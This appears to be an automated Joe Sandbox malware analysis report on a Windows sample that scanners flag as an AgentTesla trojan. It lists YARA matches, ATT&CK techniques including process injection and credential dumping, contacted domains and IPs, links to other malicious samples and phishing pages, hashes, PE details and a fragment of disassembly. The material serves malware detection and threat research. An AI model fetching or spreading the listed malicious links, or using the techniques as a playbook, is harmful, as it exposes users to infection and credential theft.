            Source: Yara match File source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe Code function: 0_2_0047AD92 OleInitialize,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 312 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem1
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            [Behavior graph] ID: 1549358; Sample: p4rsJEIb7k.exe; Startdate: 05/11/2024; Architecture: WINDOWS; Score: 100. Process chain: p4rsJEIb7k.exe (started) → svchost.exe (started) → BlltrVxNMs.exe (injected) → msiexec.exe (started) → firefox.exe (started).

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| p4rsJEIb7k.exe | 68% | ReversingLabs | Win32.Trojan.AgentTesla | |
| p4rsJEIb7k.exe | 100% | Avira | TR/AutoIt.rwrjm | |
| p4rsJEIb7k.exe | 100% | Joe Sandbox ML | | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.nagasl89.baby/themes/twentyfifteen/js/html5.jsBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.nagasl89.baby/favicon.icoBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://res.cloudinary.com/practicaldev/image/fetch/s--2ecYCSjC--/c_limitBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://gcdnb.pbrd.co/images/qYol8RtBBg8K.jpg?o=1BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://gemini.google.com/app?q=msiexec.exe, 00000003.00000003.4995883349.000000000822B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.nagasl89.baby/themes/rtp/css/custom.cssBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://res.cloudinary.com/practicaldev/image/fetch/s--KfIJiWl4--/c_imagga_scaleBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.nagasl89.baby/themes/rtp/css/styleslot.cssBlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://gcdnb.pbrd.co/images/Gegd7gc1KW00.jpg?o=1);background-size:BlltrVxNMs.exe, 00000002.00000002.9389382295.0000000005B74000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.0000000005C34000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.0000000029CD4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1549358
Start date and time: 2024-11-05 15:30:44 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 16m 26s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name: Suspected Instruction Hammering
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: p4rsJEIb7k.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@18/12
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 96%
• Number of executed functions: 36
• Number of non-executed functions: 295
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: p4rsJEIb7k.exe
Time | Type | Description
09:34:15 | API Interceptor | 24211605x Sleep call for process: msiexec.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                              • 198.54.116.219
                                                                                                              AMAZON-02USr6lOHDg9N9.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.248.169.48
                                                                                                              Employee bonus and payroll 74ae5652.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                              • 18.245.31.89
                                                                                                              https://bulbapp.com/u/sharefile?sharedLink=1db1fe96-5bdb-4c8c-ba45-33caa906abddGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 143.204.98.63
                                                                                                              Eveshaw.pdfGet hashmaliciousUnknownBrowse
                                                                                                              • 18.239.69.9
                                                                                                              https://bitbucket.org/thanksforusingourwebsite/serv/downloads/Statement-415322025.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                              • 185.166.143.50
                                                                                                              https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2eGet hashmaliciousUnknownBrowse
                                                                                                              • 76.223.1.166
                                                                                                              https://1drv.ms/o/c/66fa7da2ba9759b3/EqcaXs4PlQlIgYgaPtxczNwB_gWaZXRP_eT5RhV50i4cxw?e=5%3aJHIMrP&sharingv2=true&fromShare=true&at=9Get hashmaliciousUnknownBrowse
                                                                                                              • 34.213.87.83
                                                                                                              https://forms.office.com/e/wqvhAuyrVUGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 13.32.118.71
                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                              • 18.244.18.38
                                                                                                              https://t.ly/Oppenheim0511Get hashmaliciousGO BackdoorBrowse
                                                                                                              • 185.166.143.49
                                                                                                              TANDEMUShttps://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2eGet hashmaliciousUnknownBrowse
                                                                                                              • 15.197.239.217
                                                                                                              URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 15.197.225.128
                                                                                                              spc.elfGet hashmaliciousMiraiBrowse
                                                                                                              • 15.196.180.205
                                                                                                              nNX5KYQRhg.exeGet hashmaliciousNeconydBrowse
                                                                                                              • 15.197.204.56
                                                                                                              bd0wJGTae5.exeGet hashmaliciousNeconydBrowse
                                                                                                              • 15.197.204.56
                                                                                                              HUo09bfA3g.exeGet hashmaliciousNeconydBrowse
                                                                                                              • 15.197.204.56
                                                                                                              https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                                                              • 15.197.193.217
                                                                                                              FW CMA SHZ Freight invoice CHN1080769.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 15.197.225.128
                                                                                                              BbkbL3gS6s.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 15.197.137.111
                                                                                                              Reminders for Msp-partner_ Server Alert.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                              • 15.197.193.217
                                                                                                              No context
                                                                                                              No context
                                                                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                              Category:dropped
                                                                                                              Size (bytes):135168
                                                                                                              Entropy (8bit):1.1142956103012707
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                              MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                              SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                              SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                              SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                              Malicious:false
                                                                                                              Reputation:moderate, very likely benign file
                                                                                                              Process:C:\Users\user\Desktop\p4rsJEIb7k.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):286720
                                                                                                              Entropy (8bit):7.99504592023213
                                                                                                              Encrypted:true
                                                                                                              SSDEEP:6144:5e5z78VbkMX6OuNOVDKgm6fvvLlZQAleGPk:5el7unXPHZfvRZVleek
                                                                                                              MD5:152FAC67975BBB5EAF87AEC99C341348
                                                                                                              SHA1:15D8D84C18DD86A87C9E0E8FA54D5B925ACE84C2
                                                                                                              SHA-256:A8CC3F85157ABDC492232B20D789C7A03FDDCE8D66D6377AB26236A25042776B
                                                                                                              SHA-512:1FA120DF2BD46C394939DEAA708CE82A3F884BE2E55532AE579214B2F37672E6D9905271E171F7258572E498BDBB147EC3D6D18522A3C2B916497B69E3102158
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.516094857372396
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                              • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:p4rsJEIb7k.exe
                                                                                                              File size:1'335'565 bytes
                                                                                                              MD5:159afc06a66a86f332be92f52963b09e
                                                                                                              SHA1:0cb60fe78cad1919e4c1ef5d315752e9147a7792
                                                                                                              SHA256:64b147e7c878171760935be6fde4ba79aedf2e045e78ad8a4eaf235ce60f6fdf
                                                                                                              SHA512:b8151e8b1da1be56be3e7903d4ae9e5240b3c074323ce5f56fe37ef80d8b2ca5d0778430c8d6d76b2f9559101537014a3b1a9989d315b1096105f4a9aface259
                                                                                                              SSDEEP:24576:ffmMv6Ckr7Mny5QLap2VGs1bTZb2Th8U4xkWo5e:f3v+7/5QLa0UE2T29xi5e
                                                                                                              TLSH:CB55F112B7D680F6E9A33875197BE32AEB3575184333C49BA7E02F778E111509B363A1
                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                                              Icon Hash:1733312925935517
                                                                                                              Entrypoint:0x416310
                                                                                                              Entrypoint Section:.text
                                                                                                              Digitally signed:false
                                                                                                              Imagebase:0x400000
                                                                                                              Subsystem:windows gui
                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                              Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                              TLS Callbacks:
                                                                                                              CLR (.Net) Version:
                                                                                                              OS Version Major:5
                                                                                                              OS Version Minor:0
                                                                                                              File Version Major:5
                                                                                                              File Version Minor:0
                                                                                                              Subsystem Version Major:5
                                                                                                              Subsystem Version Minor:0
                                                                                                              Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                                              Instruction
                                                                                                              call 00007FEA2C953E8Ch
                                                                                                              jmp 00007FEA2C947C5Eh
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              int3
                                                                                                              push ebp
                                                                                                              mov ebp, esp
                                                                                                              push edi
                                                                                                              push esi
                                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                                              mov ecx, dword ptr [ebp+10h]
                                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                                              mov eax, ecx
                                                                                                              mov edx, ecx
                                                                                                              add eax, esi
                                                                                                              cmp edi, esi
                                                                                                              jbe 00007FEA2C947DEAh
                                                                                                              cmp edi, eax
                                                                                                              jc 00007FEA2C947F8Ah
                                                                                                              cmp ecx, 00000100h
                                                                                                              jc 00007FEA2C947E01h
                                                                                                              cmp dword ptr [004A94E0h], 00000000h
                                                                                                              je 00007FEA2C947DF8h
                                                                                                              push edi
                                                                                                              push esi
                                                                                                              and edi, 0Fh
                                                                                                              and esi, 0Fh
                                                                                                              cmp edi, esi
                                                                                                              pop esi
                                                                                                              pop edi
                                                                                                              jne 00007FEA2C947DEAh
                                                                                                              pop esi
                                                                                                              pop edi
                                                                                                              pop ebp
                                                                                                              jmp 00007FEA2C94824Ah
                                                                                                              test edi, 00000003h
                                                                                                              jne 00007FEA2C947DF7h
                                                                                                              shr ecx, 02h
                                                                                                              and edx, 03h
                                                                                                              cmp ecx, 08h
                                                                                                              jc 00007FEA2C947E0Ch
                                                                                                              rep movsd
                                                                                                              jmp dword ptr [00416494h+edx*4]
                                                                                                              nop
                                                                                                              mov eax, edi
                                                                                                              mov edx, 00000003h
                                                                                                              sub ecx, 04h
                                                                                                              jc 00007FEA2C947DEEh
                                                                                                              and eax, 03h
                                                                                                              add ecx, eax
                                                                                                              jmp dword ptr [004163A8h+eax*4]
                                                                                                              jmp dword ptr [004164A4h+ecx*4]
                                                                                                              nop
                                                                                                              jmp dword ptr [00416428h+ecx*4]
                                                                                                              nop
                                                                                                              mov eax, E4004163h
                                                                                                              arpl word ptr [ecx+00h], ax
                                                                                                              or byte ptr [ecx+eax*2+00h], ah
                                                                                                              and edx, ecx
                                                                                                              mov al, byte ptr [esi]
                                                                                                              mov byte ptr [edi], al
                                                                                                              mov al, byte ptr [esi+01h]
                                                                                                              mov byte ptr [edi+01h], al
                                                                                                              mov al, byte ptr [esi+02h]
                                                                                                              shr ecx, 02h
                                                                                                              mov byte ptr [edi+02h], al
                                                                                                              add esi, 03h
                                                                                                              add edi, 03h
                                                                                                              cmp ecx, 08h
                                                                                                              jc 00007FEA2C947DAEh
                                                                                                              Programming Language:
                                                                                                              • [ASM] VS2008 SP1 build 30729
                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                              • [C++] VS2008 SP1 build 30729
                                                                                                              • [ C ] VS2005 build 50727
                                                                                                              • [IMP] VS2005 build 50727
                                                                                                              • [ASM] VS2008 build 21022
                                                                                                              • [RES] VS2008 build 21022
                                                                                                              • [LNK] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x8cd3c          0x154         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xab000          0x9298        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x82000          0x840         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x80017 | 0x80200 | 6c20c6bf686768b6f134f5bd508171bc | False | 0.5602991615853659 | data | 6.634688230255595 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xd95c | 0xda00 | f979966509a93083729d23cdfd2a6f2d | False | 0.36256450688073394 | data | 4.880040824124099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a518 | 0x6800 | e5d77411f751d28c6eee48a743606795 | False | 0.1600060096153846 | data | 2.2017649896261107 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9298 | 0x9400 | f6be76de0ef2c68f397158bf01bdef3e | False | 0.4896801097972973 | data | 5.530303089784181 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x43a | data | English | Great Britain | 0.3733826247689464
RT_STRING | 0xb2c78 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3278 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb38d8 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3c60 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3db8 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3e40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3e58 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3e70 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3e88 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb4028 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, 